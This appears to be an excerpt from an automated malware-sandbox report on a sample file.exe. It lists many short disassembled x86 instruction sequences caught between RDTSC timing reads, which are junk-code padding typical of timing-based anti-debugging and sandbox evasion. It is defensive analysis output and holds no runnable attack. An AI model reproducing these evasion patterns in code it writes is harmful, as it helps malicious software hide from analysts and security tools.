                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CDE58C second address: CDE5A9 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FA22C835FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a jns 00007FA22C835FA8h 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jne 00007FA22C835FA6h 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE37C3 second address: CE37D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jc 00007FA22C516E42h 0x0000000b jne 00007FA22C516E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE37D6 second address: CE37E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007FA22C835FA6h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE37E2 second address: CE380F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FA22C516E46h 0x0000000e ja 00007FA22C516E3Eh 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE380F second address: CE3815 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE3815 second address: CE3819 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14402 second address: C1443D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C835FB6h 0x00000009 popad 0x0000000a pop eax 0x0000000b jl 00007FA22C835FD4h 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FA22C835FB7h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA3FC second address: CEA404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA404 second address: CEA40E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA40E second address: CEA414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9DAE second address: CE9DC4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C835FAAh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9DC4 second address: CE9DCE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9DCE second address: CE9E09 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FAFh 0x00000007 jmp 00007FA22C835FAFh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f pushad 0x00000010 jmp 00007FA22C835FB2h 0x00000015 pushad 0x00000016 push eax 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9E09 second address: CE9E1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA22C516E36h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f jnl 00007FA22C516E36h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9F83 second address: CE9FA6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FA22C835FAEh 0x0000000a pop esi 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f push edx 0x00000010 pop edx 0x00000011 push eax 0x00000012 pop eax 0x00000013 push ebx 0x00000014 pop ebx 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CE9FA6 second address: CE9FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CEA108 second address: CEA12C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA22C835FB9h 0x00000008 jc 00007FA22C835FA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF84EA second address: CF84F2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF84F2 second address: CF84FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF84FA second address: CF851D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA22C516E40h 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push edx 0x00000015 pop edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF851D second address: CF8524 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CF8524 second address: CF852E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jc 00007FA22C516E36h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC295 second address: CFC2A9 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FA22C835FAEh 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: CFC2A9 second address: CFC2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FA22C516E36h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02B62 second address: D02B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FA22C835FAEh 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D02B70 second address: D02B74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0A538 second address: D0A53E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0E640 second address: D0E653 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FA22C516E36h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jbe 00007FA22C516E36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D0FDE2 second address: D0FDEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F75 second address: D16F8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA22C516E44h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F8D second address: D16F91 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16F91 second address: D16FD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jmp 00007FA22C516E46h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C516E3Fh 0x00000013 jmp 00007FA22C516E42h 0x00000018 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16FD1 second address: D16FD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D15CE2 second address: D15CEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jbe 00007FA22C516E36h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16008 second address: D1600E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16182 second address: D1618B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1618B second address: D16197 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 ja 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D16197 second address: D161A1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161A1 second address: D161A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D161A5 second address: D161AF instructions: 0x00000000 rdtsc 0x00000002 jp 00007FA22C516E36h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0B2 second address: D1A0B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0B6 second address: D1A0C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b jnp 00007FA22C516E42h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0C9 second address: D1A0CF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0CF second address: D1A0EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 jmp 00007FA22C516E46h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0EC second address: D1A0F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D1A0F1 second address: D1A0FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007FA22C516E36h 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19C4E second address: D19C70 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FA22C835FA8h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007FA22C835FB3h 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19DA3 second address: D19DA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19DA7 second address: D19DC4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C835FB9h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19DC4 second address: D19DF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007FA22C516E3Eh 0x0000000e push eax 0x0000000f pop eax 0x00000010 ja 00007FA22C516E36h 0x00000016 push edx 0x00000017 jmp 00007FA22C516E48h 0x0000001c pop edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19DF4 second address: D19DFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D19DFA second address: D19E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FA22C516E36h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E65 second address: D26E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D26E6D second address: D26E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jng 00007FA22C516E3Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A112 second address: D2A118 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D2A118 second address: D2A127 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ebx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D372A5 second address: D372AF instructions: 0x00000000 rdtsc 0x00000002 je 00007FA22C835FA6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A215 second address: D3A219 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A219 second address: D3A23E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA22C835FB0h 0x0000000c jmp 00007FA22C835FACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A23E second address: D3A254 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 pushad 0x00000008 jnl 00007FA22C516E36h 0x0000000e jbe 00007FA22C516E36h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D3A254 second address: D3A282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FA22C835FB3h 0x0000000b jmp 00007FA22C835FB3h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D545A5 second address: D545D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jno 00007FA22C516E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jnl 00007FA22C516E36h 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007FA22C516E46h 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D545D2 second address: D545D7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D545D7 second address: D545ED instructions: 0x00000000 rdtsc 0x00000002 js 00007FA22C516E3Eh 0x00000008 jo 00007FA22C516E36h 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D534E5 second address: D534FD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FA22C835FB0h 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5367E second address: D53689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53954 second address: D53958 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53958 second address: D53969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007FA22C516E36h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53A8F second address: D53ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FA22C835FAAh 0x0000000e push esi 0x0000000f pop esi 0x00000010 push esi 0x00000011 pop esi 0x00000012 push eax 0x00000013 jg 00007FA22C835FA6h 0x00000019 pop eax 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e jmp 00007FA22C835FADh 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53ABC second address: D53ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 pop eax 0x00000008 popad 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D53ACA second address: D53ACF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D541AB second address: D541B0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56F51 second address: D56F57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56F57 second address: D56F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A31A second address: D5A349 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jc 00007FA22C835FA6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FA22C835FB9h 0x00000013 ja 00007FA22C835FACh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5A349 second address: D5A34D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0E3A second address: 54F0E7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 mov eax, 0E935DAFh 0x0000000a pop esi 0x0000000b popad 0x0000000c push ecx 0x0000000d jmp 00007FA22C835FB0h 0x00000012 mov dword ptr [esp], ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushfd 0x00000019 jmp 00007FA22C835FACh 0x0000001e sbb ecx, 0C3D9408h 0x00000024 jmp 00007FA22C835FABh 0x00000029 popfd 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0E7C second address: 54F0ED2 instructions: 0x00000000 rdtsc 0x00000002 movzx eax, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushfd 0x00000009 jmp 00007FA22C516E3Bh 0x0000000e and esi, 732B2C4Eh 0x00000014 jmp 00007FA22C516E49h 0x00000019 popfd 0x0000001a mov di, cx 0x0000001d popad 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007FA22C516E49h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0ED2 second address: 54F0ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0ED8 second address: 54F0EDC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54F0EDC second address: 54F0EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cl, 7Fh 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0BC8 second address: 54E0C45 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FA22C516E48h 0x00000008 xor cx, 0D78h 0x0000000d jmp 00007FA22C516E3Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 pushad 0x00000018 call 00007FA22C516E44h 0x0000001d mov edx, ecx 0x0000001f pop esi 0x00000020 mov ah, dl 0x00000022 popad 0x00000023 mov ebp, esp 0x00000025 jmp 00007FA22C516E46h 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FA22C516E47h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E0C45 second address: 54E0C5D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA22C835FB4h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5520775 second address: 552077A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 552077A second address: 5520812 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 0EF810C0h 0x00000008 jmp 00007FA22C835FB9h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ebp 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007FA22C835FACh 0x00000018 xor si, 8238h 0x0000001d jmp 00007FA22C835FABh 0x00000022 popfd 0x00000023 mov ecx, 0D2B006Fh 0x00000028 popad 0x00000029 push eax 0x0000002a pushad 0x0000002b mov ax, bx 0x0000002e mov di, 7AB2h 0x00000032 popad 0x00000033 xchg eax, ebp 0x00000034 jmp 00007FA22C835FB9h 0x00000039 mov ebp, esp 0x0000003b jmp 00007FA22C835FAEh 0x00000040 pop ebp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA22C835FB7h 0x00000048 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C00CA second address: 54C00E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA22C516E3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov di, si 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C00E1 second address: 54C00E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54C00E7 second address: 54C00EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08D7 second address: 54E08DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08DD second address: 54E08E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54E08E1 second address: 54E08FC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FA22C835FB0h 0x00000010 rdtsc
